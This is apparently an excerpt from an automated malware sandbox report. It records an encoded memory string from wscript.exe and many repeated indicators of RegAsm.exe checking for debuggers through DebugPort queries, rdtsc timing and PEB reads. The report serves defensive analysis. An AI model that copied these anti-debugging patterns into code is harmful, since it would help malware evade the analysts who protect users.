            Source: wscript.exe, 00000001.00000003.1501577328.00000257CB370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBD1C0 rdtsc 6_2_02FBD1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00417843 LdrLoadDll,6_2_00417843
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFF2F8 mov eax, dword ptr fs:[00000030h]6_2_02FFF2F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F392FF mov eax, dword ptr fs:[00000030h]6_2_02F392FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED mov eax, dword ptr fs:[00000030h]6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F502E1 mov eax, dword ptr fs:[00000030h]6_2_02F502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F502E1 mov eax, dword ptr fs:[00000030h]6_2_02F502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F502E1 mov eax, dword ptr fs:[00000030h]6_2_02F502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B2D3 mov eax, dword ptr fs:[00000030h]6_2_02F3B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B2D3 mov eax, dword ptr fs:[00000030h]6_2_02F3B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B2D3 mov eax, dword ptr fs:[00000030h]6_2_02F3B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6F2D0 mov eax, dword ptr fs:[00000030h]6_2_02F6F2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6F2D0 mov eax, dword ptr fs:[00000030h]6_2_02F6F2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300132D mov eax, dword ptr fs:[00000030h]6_2_0300132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300132D mov eax, dword ptr fs:[00000030h]6_2_0300132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F492C5 mov eax, dword ptr fs:[00000030h]6_2_02F492C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F492C5 mov eax, dword ptr fs:[00000030h]6_2_02F492C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B2C0 mov eax, dword ptr fs:[00000030h]6_2_02F6B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B2C0 mov eax, dword ptr fs:[00000030h]6_2_02F6B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B2C0 mov eax, dword ptr fs:[00000030h]6_2_02F6B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B2C0 mov eax, dword ptr fs:[00000030h]6_2_02F6B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B2C0 mov eax, dword ptr fs:[00000030h]6_2_02F6B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B2C0 mov eax, dword ptr fs:[00000030h]6_2_02F6B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B2C0 mov eax, dword ptr fs:[00000030h]6_2_02F6B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A2C3 mov eax, dword ptr fs:[00000030h]6_2_02F4A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A2C3 mov eax, dword ptr fs:[00000030h]6_2_02F4A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A2C3 mov eax, dword ptr fs:[00000030h]6_2_02F4A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A2C3 mov eax, dword ptr fs:[00000030h]6_2_02F4A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A2C3 mov eax, dword ptr fs:[00000030h]6_2_02F4A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03015341 mov eax, dword ptr fs:[00000030h]6_2_03015341
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC92BC mov eax, dword ptr fs:[00000030h]6_2_02FC92BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC92BC mov eax, dword ptr fs:[00000030h]6_2_02FC92BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC92BC mov ecx, dword ptr fs:[00000030h]6_2_02FC92BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC92BC mov ecx, dword ptr fs:[00000030h]6_2_02FC92BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300A352 mov eax, dword ptr fs:[00000030h]6_2_0300A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F502A0 mov eax, dword ptr fs:[00000030h]6_2_02F502A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F502A0 mov eax, dword ptr fs:[00000030h]6_2_02F502A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F552A0 mov eax, dword ptr fs:[00000030h]6_2_02F552A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F552A0 mov eax, dword ptr fs:[00000030h]6_2_02F552A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F552A0 mov eax, dword ptr fs:[00000030h]6_2_02F552A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F552A0 mov eax, dword ptr fs:[00000030h]6_2_02F552A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD62A0 mov eax, dword ptr fs:[00000030h]6_2_02FD62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD62A0 mov ecx, dword ptr fs:[00000030h]6_2_02FD62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD62A0 mov eax, dword ptr fs:[00000030h]6_2_02FD62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD62A0 mov eax, dword ptr fs:[00000030h]6_2_02FD62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD62A0 mov eax, dword ptr fs:[00000030h]6_2_02FD62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD62A0 mov eax, dword ptr fs:[00000030h]6_2_02FD62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD72A0 mov eax, dword ptr fs:[00000030h]6_2_02FD72A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD72A0 mov eax, dword ptr fs:[00000030h]6_2_02FD72A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7329E mov eax, dword ptr fs:[00000030h]6_2_02F7329E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7329E mov eax, dword ptr fs:[00000030h]6_2_02F7329E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7E284 mov eax, dword ptr fs:[00000030h]6_2_02F7E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7E284 mov eax, dword ptr fs:[00000030h]6_2_02F7E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC0283 mov eax, dword ptr fs:[00000030h]6_2_02FC0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC0283 mov eax, dword ptr fs:[00000030h]6_2_02FC0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC0283 mov eax, dword ptr fs:[00000030h]6_2_02FC0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F69274 mov eax, dword ptr fs:[00000030h]6_2_02F69274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F81270 mov eax, dword ptr fs:[00000030h]6_2_02F81270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F81270 mov eax, dword ptr fs:[00000030h]6_2_02F81270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0274 mov eax, dword ptr fs:[00000030h]6_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F44260 mov eax, dword ptr fs:[00000030h]6_2_02F44260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F44260 mov eax, dword ptr fs:[00000030h]6_2_02F44260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F44260 mov eax, dword ptr fs:[00000030h]6_2_02F44260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3826B mov eax, dword ptr fs:[00000030h]6_2_02F3826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0301539D mov eax, dword ptr fs:[00000030h]6_2_0301539D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3A250 mov eax, dword ptr fs:[00000030h]6_2_02F3A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFB256 mov eax, dword ptr fs:[00000030h]6_2_02FFB256
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFB256 mov eax, dword ptr fs:[00000030h]6_2_02FFB256
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F46259 mov eax, dword ptr fs:[00000030h]6_2_02F46259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39240 mov eax, dword ptr fs:[00000030h]6_2_02F39240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39240 mov eax, dword ptr fs:[00000030h]6_2_02F39240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7724D mov eax, dword ptr fs:[00000030h]6_2_02F7724D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3823B mov eax, dword ptr fs:[00000030h]6_2_02F3823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030153FC mov eax, dword ptr fs:[00000030h]6_2_030153FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F77208 mov eax, dword ptr fs:[00000030h]6_2_02F77208
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F77208 mov eax, dword ptr fs:[00000030h]6_2_02F77208
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E3F0 mov eax, dword ptr fs:[00000030h]6_2_02F5E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E3F0 mov eax, dword ptr fs:[00000030h]6_2_02F5E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E3F0 mov eax, dword ptr fs:[00000030h]6_2_02F5E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F763FF mov eax, dword ptr fs:[00000030h]6_2_02F763FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFF3E6 mov eax, dword ptr fs:[00000030h]6_2_02FFF3E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F503E9 mov eax, dword ptr fs:[00000030h]6_2_02F503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F503E9 mov eax, dword ptr fs:[00000030h]6_2_02F503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F503E9 mov eax, dword ptr fs:[00000030h]6_2_02F503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F503E9 mov eax, dword ptr fs:[00000030h]6_2_02F503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F503E9 mov eax, dword ptr fs:[00000030h]6_2_02F503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F503E9 mov eax, dword ptr fs:[00000030h]6_2_02F503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F503E9 mov eax, dword ptr fs:[00000030h]6_2_02F503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F503E9 mov eax, dword ptr fs:[00000030h]6_2_02F503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03015227 mov eax, dword ptr fs:[00000030h]6_2_03015227
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFB3D0 mov ecx, dword ptr fs:[00000030h]6_2_02FFB3D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFC3CD mov eax, dword ptr fs:[00000030h]6_2_02FFC3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A3C0 mov eax, dword ptr fs:[00000030h]6_2_02F4A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A3C0 mov eax, dword ptr fs:[00000030h]6_2_02F4A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A3C0 mov eax, dword ptr fs:[00000030h]6_2_02F4A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A3C0 mov eax, dword ptr fs:[00000030h]6_2_02F4A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A3C0 mov eax, dword ptr fs:[00000030h]6_2_02F4A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4A3C0 mov eax, dword ptr fs:[00000030h]6_2_02F4A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F483C0 mov eax, dword ptr fs:[00000030h]6_2_02F483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F483C0 mov eax, dword ptr fs:[00000030h]6_2_02F483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F483C0 mov eax, dword ptr fs:[00000030h]6_2_02F483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F483C0 mov eax, dword ptr fs:[00000030h]6_2_02F483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC63C0 mov eax, dword ptr fs:[00000030h]6_2_02FC63C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F633A5 mov eax, dword ptr fs:[00000030h]6_2_02F633A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F733A0 mov eax, dword ptr fs:[00000030h]6_2_02F733A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F733A0 mov eax, dword ptr fs:[00000030h]6_2_02F733A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F9739A mov eax, dword ptr fs:[00000030h]6_2_02F9739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F9739A mov eax, dword ptr fs:[00000030h]6_2_02F9739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F38397 mov eax, dword ptr fs:[00000030h]6_2_02F38397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F38397 mov eax, dword ptr fs:[00000030h]6_2_02F38397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F38397 mov eax, dword ptr fs:[00000030h]6_2_02F38397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300D26B mov eax, dword ptr fs:[00000030h]6_2_0300D26B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300D26B mov eax, dword ptr fs:[00000030h]6_2_0300D26B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6438F mov eax, dword ptr fs:[00000030h]6_2_02F6438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6438F mov eax, dword ptr fs:[00000030h]6_2_02F6438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3E388 mov eax, dword ptr fs:[00000030h]6_2_02F3E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3E388 mov eax, dword ptr fs:[00000030h]6_2_02F3E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3E388 mov eax, dword ptr fs:[00000030h]6_2_02F3E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03015283 mov eax, dword ptr fs:[00000030h]6_2_03015283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FE437C mov eax, dword ptr fs:[00000030h]6_2_02FE437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F47370 mov eax, dword ptr fs:[00000030h]6_2_02F47370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F47370 mov eax, dword ptr fs:[00000030h]6_2_02F47370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F47370 mov eax, dword ptr fs:[00000030h]6_2_02F47370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFF367 mov eax, dword ptr fs:[00000030h]6_2_02FFF367
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39353 mov eax, dword ptr fs:[00000030h]6_2_02F39353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39353 mov eax, dword ptr fs:[00000030h]6_2_02F39353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC035C mov eax, dword ptr fs:[00000030h]6_2_02FC035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC035C mov eax, dword ptr fs:[00000030h]6_2_02FC035C
